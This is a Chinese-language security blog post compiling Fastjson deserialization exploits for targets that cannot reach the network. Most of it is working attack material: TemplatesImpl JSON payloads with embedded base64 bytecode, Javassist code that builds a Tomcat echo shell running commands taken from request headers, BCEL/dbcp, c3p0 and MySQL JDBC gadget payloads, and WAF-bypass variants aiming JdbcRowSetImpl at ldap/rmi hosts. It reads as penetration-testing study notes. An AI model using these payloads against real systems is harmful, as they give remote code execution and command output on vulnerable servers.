{    "a": {        "@type": "java.lang.Class",        "val": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"        },    "b": {        "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",        "_bytecodes": ["yv66vgAAADQAGwEAIWNvbS9zdW1tZXJzZWMveC9UZXN0NDUxODM4NTQyOTIwMAcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAApTb3VyY2VGaWxlAQAWVGVzdDQ1MTgzODU0MjkyMDAuamF2YQEABjxpbml0PgEAAygpVgwABwAICgAEAAkBABFqYXZhL2xhbmcvUnVudGltZQcACwEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMAA0ADgoADAAPAQAIY2FsYy5leGUIABEBAARleGVjAQAnKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1Byb2Nlc3M7DAATABQKAAwAFQEABENvZGUBAEBjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5zbGV0BwAYCgAZAAkAIQACABkAAAAAAAEAAQAHAAgAAQAXAAAAGgACAAEAAAAOKrcAGrgAEBIStgAWV7EAAAAAAAEABQAAAAIABg=="],        '_name': 'a.b',        '_tfactory': {},        "_outputProperties": {},        "_name": "b",        "_version": "1.0",        "allowedProtocols": "all"      }}

结合Tomcat回显

用到之前分析的java反序列化漏洞之回显

https://www.penson.top/article/av30#toc-heading-2

package com.fastjson不出网;import com.alibaba.fastjson.JSON;import com.alibaba.fastjson.parser.Feature;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import javassist.*;import org.apache.tomcat.util.codec.binary.Base64;public class TemplatesImpl {    public static CtClass makeClass() throws CannotCompileException {        ClassPool classPool = ClassPool.getDefault();        CtClass clazz = classPool.makeClass("com.summersec.x.Test" + System.nanoTime());        clazz.addConstructor(CtNewConstructor.make("public Test(){ Runtime.getRuntime().exec(\"calc.exe\");}",clazz));        return clazz;    }    public static CtClass genPayload(ClassPool pool) throws Exception {        CtClass clazz = pool.makeClass("com.summersec.x.Test" + System.nanoTime());        if ((clazz.getDeclaredConstructors()).length != 0) {            clazz.removeConstructor(clazz.getDeclaredConstructors()[0]);        }        //HTTPServletRequest.class        //HTTPServletResponse.class        clazz.addField(CtField.make("static java.util.HashSet/*<Object>*/ h;", clazz));        clazz.addField(CtField.make("static javax.servlet.http.HttpServletRequest r;",clazz));        clazz.addField(CtField.make("static javax.servlet.http.HttpServletResponse p;",clazz));//        clazz.addField(CtField.make("static int depth ;",clazz));        clazz.addMethod(CtMethod.make("private static boolean i(Object obj){        if(obj==null|| h.contains(obj)){            return true;        }        h.add(obj);        return false;    }",clazz));//        clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){        Class n=start.getClass();        do{            java.lang.reflect.Field declaredField = null;            java.lang.reflect.Field[] fields = n.getDeclaredFields();            int length = n.getDeclaredFields().length;            for (int i =0 ; i <= length; i++){                declaredField = fields[i];                declaredField.setAccessible(true);                Object o = null;                try{                    o = declaredField.get(start);                    if(!o.getClass().isArray()){                        p(o,depth);                    }else{                        Object[] array = (Object[])o;                        for (int q = 0; q < array.length; q++){                            p(array[q], depth);                        }                    }                }catch (Exception e){                }            }        }while(                (n = n.getSuperclass())!=null        );    }",clazz));        clazz.addMethod(CtMethod.make("private static void F(Object start, int depth){}",clazz));        clazz.addMethod(CtMethod.make("    private static void p(Object o, int depth){\n" +                "        if(depth > 52||(r !=null&& p !=null)){\n" +                "            return;\n" +                "        }\n" +                "        if(!i(o)){\n" +                "            if(r ==null&&javax.servlet.http.HttpServletRequest.class.isAssignableFrom(o.getClass())){\n" +                "                r = (javax.servlet.http.HttpServletRequest)o;\n" +                "                if(r.getHeader(\"Ctmd\")==null && r.getHeader(\"c\") == null) {\n" +                "                    r = null;\n" +                "                }else{\n" +                "                    try {\n" +                "                        p = (javax.servlet.http.HttpServletResponse) r.getClass().getMethod(\"getResponse\",null).invoke(r,null);\n" +                "\n" +                "                    } catch (Exception e) {\n" +                "                        r = null;\n" +                "                    }\n" +                "                }\n" +                "\n" +                "            }\n" +                "            if(r !=null&& p !=null){\n" +                "                try {\n" +                "                    \n" +                "                    if (r.getHeader(\"Ctmd\") != null) {\n" +                "                        p.addHeader(\"techo\",r.getHeader(\"Ctmd\"));\n" +                "                    }else {\n" +                "                        p.getWriter().println(\"$$$\" + new java.util.Scanner(Runtime.getRuntime().exec(r.getHeader(\"c\")).getInputStream()).useDelimiter(\"\\\\A\").next() + \"$$$\");\n" +                //"                        p.getWriter().println(\"$$$\" +  org.apache.shiro.codec.Base64.encodeToString(new java.util.Scanner(Runtime.getRuntime().exec(org.apache.shiro.codec.Base64.decodeToString(r.getHeader(\"c\"))).getInputStream()).useDelimiter(\"\\\\A\").next().getBytes()) + \"$$$\");\n" +                "                        p.getWriter().flush();\n" +                "                        p.getWriter().close();\n" +                "                    }\n" +                "                    \n" +                "\n" +                "                }catch (Exception e){\n" +                "                }\n" +                "                return;\n" +                "            }\n" +                "\n" +                "            F(o,depth+1);\n" +                "        }\n" +                "    }",clazz));        clazz.getDeclaredMethod("F").setBody("{Class n = $1.getClass();\n" +                "        do{\n" +                "            java.lang.reflect.Field f = null;\n" +                "            int l = n.getDeclaredFields().length;\n" +                "            for (int i = 0; i < l; i++) {\n" +                "                f = n.getDeclaredFields()[i];\n" +                "                f.setAccessible(true);\n" +                "                Object o = null;\n" +                "                try{\n" +                "                    o = f.get($1);\n" +                "\n" +                "                    if(!o.getClass().isArray()){\n" +                "                        p(o,$2);\n" +                "                    }else{\n" +                "                        Object q = null;\n" +                "                        Object[] objs = (Object[])o;\n"+                "                        int len = java.lang.reflect.Array.getLength(o);\n" +                "                        for (int j = 0; j < len; j++) {\n" +                "                            q = objs[j];\n"+                "                            p(q, $2);\n" +                "                        }\n" +                "\n" +                "                    }\n" +                "\n" +                "                }catch (Exception e){\n" +                "                }\n" +                "            }\n" +                "\n" +                "        }while(\n" +                "                (n = n.getSuperclass())!=null\n" +                "        );}");        clazz.addConstructor(CtNewConstructor.make("public dfs(){       r = null;        p = null;        h =new java.util.HashSet/*<Object>*/();        F(Thread.currentThread(),0);    }",clazz));        return clazz;    }    public static void main(String args[]) throws Exception {        ClassPool aDefault = ClassPool.getDefault();        CtClass ctClass = genPayload(aDefault);        ctClass.setSuperclass((aDefault.get(AbstractTranslet.class.getName())));            byte[] evilCode = ctClass.toBytecode();            String encode = Base64.encodeBase64String(evilCode);            String json = "{" +                    "    \"a\": {" +                    "        \"@type\": \"java.lang.Class\"," +                    "        \"val\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"" +                    "        }," +                    "    \"b\": {" +                    "        \"@type\": \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\"," +                    "        \"_bytecodes\": [\""+encode+"\"]," +                    "        '_name': 'a.b'," +                    "        '_tfactory': {}," +                    "        \"_outputProperties\": {}," +                    "        \"_name\": \"b\"," +                    "        \"_version\": \"1.0\"," +                    "        \"allowedProtocols\": \"all\"" +                    "      }" +                    "}";            System.out.println(json);            JSON.parseObject(json, Object.class, Feature.SupportNonPublicField);    }}
{    "a": {        "@type": "java.lang.Class",        "val": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl"        },    "b": {        "@type": "com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl",        "_bytecodes": ["yv66vgAAADQAuwEAIWNvbS9zdW1tZXJzZWMveC9UZXN0NDg0OTk0MDA5NDgwMAcAAQEAQGNvbS9zdW4vb3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ydW50aW1lL0Fic3RyYWN0VHJhbnNsZXQHAAMBAAFpAQAVKExqYXZhL2xhbmcvT2JqZWN0OylaAQAEQ29kZQEADVN0YWNrTWFwVGFibGUBAAFoAQATTGphdmEvdXRpbC9IYXNoU2V0OwwACQAKCQACAAsBABFqYXZhL3V0aWwvSGFzaFNldAcADQEACGNvbnRhaW5zDAAPAAYKAA4AEAEAA2FkZAwAEgAGCgAOABMBAAFGAQAWKExqYXZhL2xhbmcvT2JqZWN0O0kpVgEAE2phdmEvbGFuZy9FeGNlcHRpb24HABcBABBqYXZhL2xhbmcvT2JqZWN0BwAZAQAPamF2YS9sYW5nL0NsYXNzBwAbAQAXamF2YS9sYW5nL3JlZmxlY3QvRmllbGQHAB0BABNbTGphdmEvbGFuZy9PYmplY3Q7BwAfAQAIZ2V0Q2xhc3MBABMoKUxqYXZhL2xhbmcvQ2xhc3M7DAAhACIKABoAIwEAEWdldERlY2xhcmVkRmllbGRzAQAcKClbTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwAJQAmCgAcACcBACJqYXZhL2xhbmcvcmVmbGVjdC9BY2Nlc3NpYmxlT2JqZWN0BwApAQANc2V0QWNjZXNzaWJsZQEABChaKVYMACsALAoAKgAtAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAC8AMAoAHgAxAQAHaXNBcnJheQEAAygpWgwAMwA0CgAcADUBAAFwDAA3ABYKAAIAOAEAF2phdmEvbGFuZy9yZWZsZWN0L0FycmF5BwA6AQAJZ2V0TGVuZ3RoAQAVKExqYXZhL2xhbmcvT2JqZWN0OylJDAA8AD0KADsAPgEADWdldFN1cGVyY2xhc3MMAEAAIgoAHABBAQABcgEAJ0xqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0OwwAQwBECQACAEUBAChMamF2YXgvc2VydmxldC9odHRwL0h0dHBTZXJ2bGV0UmVzcG9uc2U7DAA3AEcJAAIASAwABQAGCgACAEoBACVqYXZheC9zZXJ2bGV0L2h0dHAvSHR0cFNlcnZsZXRSZXF1ZXN0BwBMAQAQaXNBc3NpZ25hYmxlRnJvbQEAFChMamF2YS9sYW5nL0NsYXNzOylaDABOAE8KABwAUAEABEN0bWQIAFIBAAlnZXRIZWFkZXIBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwwAVABVCwBNAFYBAAFjCABYCwBNACMBAAtnZXRSZXNwb25zZQgAWwEACWdldE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAF0AXgoAHABfAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwBhAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DABjAGQKAGIAZQEAJmphdmF4L3NlcnZsZXQvaHR0cC9IdHRwU2VydmxldFJlc3BvbnNlBwBnAQAFdGVjaG8IAGkBAAlhZGRIZWFkZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7TGphdmEvbGFuZy9TdHJpbmc7KVYMAGsAbAsAaABtAQAdamF2YXgvc2VydmxldC9TZXJ2bGV0UmVzcG9uc2UHAG8BAAlnZXRXcml0ZXIBABcoKUxqYXZhL2lvL1ByaW50V3JpdGVyOwwAcQByCwBwAHMBABZqYXZhL2xhbmcvU3RyaW5nQnVmZmVyBwB1AQAGPGluaXQ+AQADKClWDAB3AHgKAHYAeQEAAyQkJAgAewEABmFwcGVuZAEALChMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9TdHJpbmdCdWZmZXI7DAB9AH4KAHYAfwEAEWphdmEvdXRpbC9TY2FubmVyBwCBAQARamF2YS9sYW5nL1J1bnRpbWUHAIMBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1bnRpbWU7DACFAIYKAIQAhwEABGV4ZWMBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvUHJvY2VzczsMAIkAigoAhACLAQARamF2YS9sYW5nL1Byb2Nlc3MHAI0BAA5nZXRJbnB1dFN0cmVhbQEAFygpTGphdmEvaW8vSW5wdXRTdHJlYW07DACPAJAKAI4AkQEAGChMamF2YS9pby9JbnB1dFN0cmVhbTspVgwAdwCTCgCCAJQBAAJcQQgAlgEADHVzZURlbGltaXRlcgEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvdXRpbC9TY2FubmVyOwwAmACZCgCCAJoBAARuZXh0AQAUKClMamF2YS9sYW5nL1N0cmluZzsMAJwAnQoAggCeAQAIdG9TdHJpbmcMAKAAnQoAdgChAQATamF2YS9pby9QcmludFdyaXRlcgcAowEAB3ByaW50bG4BABUoTGphdmEvbGFuZy9TdHJpbmc7KVYMAKUApgoApACnAQAFZmx1c2gMAKkAeAoApACqAQAFY2xvc2UMAKwAeAoApACtDAAVABYKAAIArwoABAB5CgAOAHkBABBqYXZhL2xhbmcvVGhyZWFkBwCzAQANY3VycmVudFRocmVhZAEAFCgpTGphdmEvbGFuZy9UaHJlYWQ7DAC1ALYKALQAtwEAClNvdXJjZUZpbGUBABZUZXN0NDg0OTk0MDA5NDgwMC5qYXZhACEAAgAEAAAAAwAIAAkACgAAAAgAQwBEAAAACAA3AEcAAAAEAAoABQAGAAEABwAAADEAAgABAAAAGyoBpQANsgAMKrYAEZkABQSssgAMKrYAFFcDrAAAAAEACAAAAAQAAg8BAAoAFQAWAAEABwAAAP4AAgAMAAAAiiq2ACRNAU4stgAovjYEAzYFFQUVBKIAaiy2ACgVBTJOLQS2AC4BOgYtKrYAMjoGGQa2ACS2ADaaAAwZBhu4ADmnADEBOgcZBsAAIDoIGQa4AD82CQM2ChUKFQmiABYZCBUKMjoHGQcbuAA5hAoBp//ppwAIOgunAAOEBQGn/5UstgBCWU0Bpv9/sQABACgAcQB0ABgAAQAIAAAAWgAI/wAFAAMHABoBBwAcAAD+AAsHAB4BAfwAMQcAGv8AEwALBwAaAQcAHAcAHgEBBwAaBwAaBwAgAQEAAP8AGQAHBwAaAQcAHAcAHgEBBwAaAABCBwAYBPoABQAKADcAFgABAAcAAAFwAAcABAAAASgbEDSjABSyAEYBpQAKsgBJAaYABqcABLEquABLmgELsgBGAaYADxJNKrYAJLYAUZoABqcAVirAAE2zAEayAEYSU7kAVwIAAaYAEbIARhJZuQBXAgABpQAGpwAKAbMARqcAKbIARrkAWgEAElwBtgBgsgBGAbYAZsAAaLMASacAC00BswBGpwADsgBGAaUACrIASQGmAAanAIqyAEYSU7kAVwIAAaUAGrIASRJqsgBGElO5AFcCALkAbgMApwBdsgBJuQB0AQC7AHZZtwB6Eny2AIC7AIJZuACIsgBGElm5AFcCALYAjLYAkrcAlRKXtgCbtgCftgCAEny2AIC2AKK2AKiyAEm5AHQBALYAq7IASbkAdAEAtgCupwAHTqcAA7EqGwRguACwsQACAGIAfQCAABgAmQEYARsAGAABAAgAAAAmABL/ABQAAgcAGgEAAAIAGQIiAgZdBwAYBw0CJPsAWUIHABgDAAYAAQB3AHgAAQAHAAAAKgACAAEAAAAeKrcAsQGzAEYBswBJuwAOWbcAsrMADLgAuAO4ALCxAAAAAAABALkAAAACALo="],        '_name': 'a.b',        '_tfactory': {},        "_outputProperties": {},        "_name": "b",        "_version": "1.0",        "allowedProtocols": "all"      }}

image-20211223195858980

org.apache.tomcat.dbcp.dbcp2.BasicDataSource

用到的是tomcat的依赖或者存在tomcat环境

<dependency>    <groupId>org.apache.tomcat</groupId>    <artifactId>tomcat-dbcp</artifactId>    <version>9.0.8</version></dependency>

将恶意class文件生成BCEL格式(低版本环境运行)

exp

package com.fastjson不出网;import com.sun.org.apache.bcel.internal.classfile.Utility;import java.io.BufferedWriter;import java.io.FileWriter;import java.io.IOException;import java.nio.file.Files;import java.nio.file.Path;import java.nio.file.Paths;public class dbcp {        public static void main(String[] args) throws IOException {            Path path = Paths.get("F:\\网络安全\\java安全\\jndi_test\\src\\main\\java\\com\\learn\\exp\\Test.class");            byte[] bytes = Files.readAllBytes(path);            System.out.println(bytes.length);            String result = Utility.encode(bytes,true);            BufferedWriter bw = new BufferedWriter(new FileWriter("F:\\网络安全\\java安全\\jndi_test\\src\\main\\java\\com\\fastjson不出网\\1.txt"));            bw.write("$$BCEL$$" + result);            bw.close();        }}

<=1.2.47

{    "a": {        "@type": "java.lang.Class",        "val": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource"    },    "b": {        "@type": "java.lang.Class",        "val": "com.sun.org.apache.bcel.internal.util.ClassLoader"    },    "c": {        "@type": "org.apache.tomcat.dbcp.dbcp2.BasicDataSource",        "driverClassLoader": {            "@type": "com.sun.org.apache.bcel.internal.util.ClassLoader"        },        "driverClassName": "###EVIL_CODE###"    }}

但是这个用法只能在低版本的java里使用,并且条件还是挺苛刻的

image-20211223221428875

如果是parseObject必须要为Object.class才有效,换到parse方法

image-20211223221725276

看到p神的文章

https://www.leavesongs.com/PENETRATION/where-is-bcel-classloader.html

image-20211223213432719

p神给出了很好解释

c3p0反序列化配合cc链tomcat回显带入

由于c3p0覆盖面很广,所以这个还是很有用的,c3p0的链子分析网上有很多

以HexAsciiSerializedMap开头的字符串会自动进行解码并触发原生反序列化

package com.fastjson不出网;import com.alibaba.fastjson.JSON;import java.io.FileInputStream;import java.io.IOException;import java.io.InputStream;public class C3p0 {    public static void main(String[] args) throws Exception {        Allecho allecho = new Allecho();        byte[] payload = CommonsCollections2.echogenerate(allecho);        String HexString = bytesToHexString(payload, payload.length);        String poc = "{\"e\":{\"@type\":\"java.lang.Class\",\"val\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\"},\"f\":{\"@type\":\"com.mchange.v2.c3p0.WrapperConnectionPoolDataSource\",\"userOverridesAsString\":\"HexAsciiSerializedMap:"+HexString+";\"}}";        System.out.println(poc);//        JSON.parseObject(poc);    }    public static byte[] toByteArray(InputStream in) throws IOException {        byte[] classBytes;        classBytes = new byte[in.available()];        in.read(classBytes);        in.close();        return classBytes;    }    public static String bytesToHexString(byte[] bArray, int length) {        StringBuffer sb = new StringBuffer(length);        for(int i = 0; i < length; ++i) {            String sTemp = Integer.toHexString(255 & bArray[i]);            if (sTemp.length() < 2) {                sb.append(0);            }            sb.append(sTemp.toUpperCase());        }        return sb.toString();    }}

image-20211224211639337

{ "name": { "@type": "java.lang.AutoCloseable", "@type": "com.mysql.jdbc.JDBC4Connection", "hostToConnectTo": "127.0.0.1", "portToConnectTo": 3306, "info": { "user": "CommonsCollections2", "password": "pass", "statementInterceptors": "com.mysql.jdbc.interceptors.ServerStatusDiffInterceptor", "autoDeserialize": "true", "NUM_HOSTS": "1" }, "databaseToConnectTo": "dbname", "url": "" } }

http://redteam.today/2020/04/18/c3p0%E7%9A%84%E4%B8%89%E4%B8%AAgadget/

https://github.com/depycode/fastjson-c3p0

Fastjson WAF 绕过

1、unicode编码

{"b":{"\u0040\u0074\u0079\u0070\u0065":"\u0063\u006f\u006d\u002e\u0073\u0075\u006e\u002e\u0072\u006f\u0077\u0073\u0065\u0074\u002e\u004a\u0064\u0062\u0063\u0052\u006f\u0077\u0053\u0065\u0074\u0049\u006d\u0070\u006c","\u0064\u0061\u0074\u0061\u0053\u006f\u0075\u0072\u0063\u0065\u004e\u0061\u006d\u0065":"ldap://t00ls.5cd37009d59fc2c7fc55f2bee57cafab.dnslog.cn/aaa","autoCommit":true}}

2、XCTF-校战“疫”中的ctf题目的一个payload:\x74

{"@\x74ype":"org.apache.commons.configuration.JNDIConfiguration","- prefix":"rmi://xxx.xxx"}

3、\b

{"@type":\b"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://127.0.0.1:9999","autoCommit":true}}

4、/**/

{"@type":/**/"Lcom.sun.rowset.JdbcRowSetImpl","dataSourceName":"###RMI_LDAP_ADDRESS###","autoCommit":

裁缝怪到此结束,本篇主要是对大锅们的文章做一个总结

参考:

https://yinwc.github.io/2020/07/21/fastjsonlearn/

https://f5.pm/go-83366.html

https://mp.weixin.qq.com/s/LZt-I3s0dQ_bK9ubEix8iQ

https://choge.top/2020/10/12/fastjson%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/

https://www.anquanke.com/post/id/239867

https://zeo.cool/2020/07/04/%E7%BA%A2%E9%98%9F%E6%AD%A6%E5%99%A8%E5%BA%93!fastjson%E5%B0%8F%E4%BA%8E1.2.68%E5%85%A8%E6%BC%8F%E6%B4%9ERCE%E5%88%A9%E7%94%A8exp/


文章作者: penson
文章链接: https://www.penson.top
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 penson !
评论
  目录

梨花香-霜雪千年